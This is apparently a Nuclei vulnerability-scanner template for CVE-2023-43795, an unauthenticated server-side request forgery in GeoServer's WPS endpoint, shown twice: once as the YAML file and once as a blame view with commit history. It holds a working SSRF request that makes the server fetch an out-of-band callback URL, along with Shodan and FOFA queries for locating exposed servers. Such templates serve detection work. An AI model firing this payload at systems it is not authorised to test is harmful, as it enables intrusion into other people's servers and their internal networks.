nuclei-templates/http/cves/2023/CVE-2023-43795.yaml

id: CVE-2023-43795

info:
  name: GeoServer WPS - Server Side Request Forgery
  author: DhiyaneshDK
  severity: critical
  description: |
    GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. The OGC Web Processing Service (WPS) specification is designed to process information from any server using GET and POST requests. This presents the opportunity for Server Side Request Forgery. This vulnerability has been patched in version 2.22.5 and 2.23.2.
  reference:
    - https://www.synacktiv.com/advisories/unauthenticated-server-side-request-forgery-crlf-injection-in-geoserver-wms.html
    - https://github.com/geoserver/geoserver/security/advisories/GHSA-5pr3-m5hm-9956
    - https://nvd.nist.gov/vuln/detail/CVE-2023-43795
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-43795
    cwe-id: CWE-918
    epss-score: 0.10955
    epss-percentile: 0.94582
    cpe: cpe:2.3:a:osgeo:geoserver:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: osgeo
    product: geoserver
    shodan-query: title:"GeoServer"
    fofa-query: app="GeoServer"
  tags: cve2023,cve,geoserver,ssrf,oast,oos,osgeo
variables:
  oast: "{{interactsh-url}}"
  string: "{{to_lower(rand_text_alpha(4))}}"
  value: "{{to_lower(rand_text_alpha(5))}}"

http:
  - raw:
      - |
        POST {{path}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/xml

        <?xml version="1.0" encoding="UTF-8"?>
        <wps:Execute version="1.0.0" service="WPS"
          xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
          xmlns="http://www.opengis.net/wps/1.0.0"
          xmlns:wfs="http://www.opengis.net/wfs"
          xmlns:wps="http://www.opengis.net/wps/1.0.0"
          xmlns:ows="http://www.opengis.net/ows/1.1"
          xmlns:gml="http://www.opengis.net/gml"
          xmlns:ogc="http://www.opengis.net/ogc"
          xmlns:wcs="http://www.opengis.net/wcs/1.1.1"
          xmlns:xlink="http://www.w3.org/1999/xlink"
                xsi:schemaLocation="http://www.opengis.net/wps/1.0.0 http://schemas.opengis.net/wps/1.0.0/wpsAll.xsd">
          <ows:Identifier>JTS:area</ows:Identifier>
          <wps:DataInputs>
            <wps:Input>
              <ows:Identifier>geom</ows:Identifier>
              <wps:Reference mimeType="application/json" xlink:href="https://{{oast}}" method="GET">
                <wps:Header key="{{string}}" value="{{value}}"/>
              </wps:Reference>
            </wps:Input>
          </wps:DataInputs>
          <wps:ResponseForm>
            <wps:RawDataOutput>
              <ows:Identifier>result</ows:Identifier>
            </wps:RawDataOutput>
          </wps:ResponseForm>
        </wps:Execute>

    payloads:
      path:
        - /wms
        - /geoserver/wms

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - contains(interactsh_protocol, 'http')
          - contains_all(to_lower(interactsh_request), '{{string}}','{{value}}')
          - status_code == 200
        condition: and
# digest: 4a0a00473045022100ac8ab3f5f82bdb6d41d0b1b21f4d0bf9d48ba57338423040b5fabc3c289d850e02207b5ec0b9a8dbc3677be9cbdd4b31536f0748381b6dfef68d4f28bc96d8796a03:922c64590222798bb761d5b6d8e72950
Added CVE-2023-43795 (GeoServer WPS - Server Side Request Forgery) 🔥 (#8522) * Create CVE-2023-41339.yaml * lint fix * cve id update --------- Co-authored-by: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-11-02 13:53:59 +00:00			`id: CVE-2023-43795`

			`info:`
			`name: GeoServer WPS - Server Side Request Forgery`
			`author: DhiyaneshDK`
			`severity: critical`
			`description: \|`
			`GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. The OGC Web Processing Service (WPS) specification is designed to process information from any server using GET and POST requests. This presents the opportunity for Server Side Request Forgery. This vulnerability has been patched in version 2.22.5 and 2.23.2.`
			`reference:`
			`- https://www.synacktiv.com/advisories/unauthenticated-server-side-request-forgery-crlf-injection-in-geoserver-wms.html`
			`- https://github.com/geoserver/geoserver/security/advisories/GHSA-5pr3-m5hm-9956`
			`- https://nvd.nist.gov/vuln/detail/CVE-2023-43795`
			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 9.8`
			`cve-id: CVE-2023-43795`
			`cwe-id: CWE-918`
TemplateMan Update [Sun Jan 14 13:49:26 UTC 2024] :robot: 2024-01-14 13:49:27 +00:00			`epss-score: 0.10955`
			`epss-percentile: 0.94582`
Added CVE-2023-43795 (GeoServer WPS - Server Side Request Forgery) 🔥 (#8522) * Create CVE-2023-41339.yaml * lint fix * cve id update --------- Co-authored-by: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-11-02 13:53:59 +00:00			`cpe: cpe:2.3:a:osgeo:geoserver::::::::`
			`metadata:`
			`verified: true`
			`max-request: 2`
			`vendor: osgeo`
			`product: geoserver`
			`shodan-query: title:"GeoServer"`
			`fofa-query: app="GeoServer"`
auto tagging via templateman 2024-01-14 09:21:50 +00:00			`tags: cve2023,cve,geoserver,ssrf,oast,oos,osgeo`
Added CVE-2023-43795 (GeoServer WPS - Server Side Request Forgery) 🔥 (#8522) * Create CVE-2023-41339.yaml * lint fix * cve id update --------- Co-authored-by: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-11-02 13:53:59 +00:00			`variables:`
			`oast: "{{interactsh-url}}"`
			`string: "{{to_lower(rand_text_alpha(4))}}"`
			`value: "{{to_lower(rand_text_alpha(5))}}"`

			`http:`
			`- raw:`
			`- \|`
			`POST {{path}} HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/xml`

			`<?xml version="1.0" encoding="UTF-8"?>`
			`<wps:Execute version="1.0.0" service="WPS"`
			`xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"`
			`xmlns="http://www.opengis.net/wps/1.0.0"`
			`xmlns:wfs="http://www.opengis.net/wfs"`
			`xmlns:wps="http://www.opengis.net/wps/1.0.0"`
			`xmlns:ows="http://www.opengis.net/ows/1.1"`
			`xmlns:gml="http://www.opengis.net/gml"`
			`xmlns:ogc="http://www.opengis.net/ogc"`
			`xmlns:wcs="http://www.opengis.net/wcs/1.1.1"`
			`xmlns:xlink="http://www.w3.org/1999/xlink"`
			`xsi:schemaLocation="http://www.opengis.net/wps/1.0.0 http://schemas.opengis.net/wps/1.0.0/wpsAll.xsd">`
			`<ows:Identifier>JTS:area</ows:Identifier>`
			`<wps:DataInputs>`
			`<wps:Input>`
			`<ows:Identifier>geom</ows:Identifier>`
			`<wps:Reference mimeType="application/json" xlink:href="https://{{oast}}" method="GET">`
			`<wps:Header key="{{string}}" value="{{value}}"/>`
			`</wps:Reference>`
			`</wps:Input>`
			`</wps:DataInputs>`
			`<wps:ResponseForm>`
			`<wps:RawDataOutput>`
			`<ows:Identifier>result</ows:Identifier>`
			`</wps:RawDataOutput>`
			`</wps:ResponseForm>`
			`</wps:Execute>`

			`payloads:`
			`path:`
			`- /wms`
			`- /geoserver/wms`

			`stop-at-first-match: true`
			`matchers:`
			`- type: dsl`
			`dsl:`
			`- contains(interactsh_protocol, 'http')`
			`- contains_all(to_lower(interactsh_request), '{{string}}','{{value}}')`
			`- status_code == 200`
			`condition: and`
Auto Template Signing [Fri Jan 26 08:31:11 UTC 2024] :robot: 2024-01-26 08:31:11 +00:00			`# digest: 4a0a00473045022100ac8ab3f5f82bdb6d41d0b1b21f4d0bf9d48ba57338423040b5fabc3c289d850e02207b5ec0b9a8dbc3677be9cbdd4b31536f0748381b6dfef68d4f28bc96d8796a03:922c64590222798bb761d5b6d8e72950`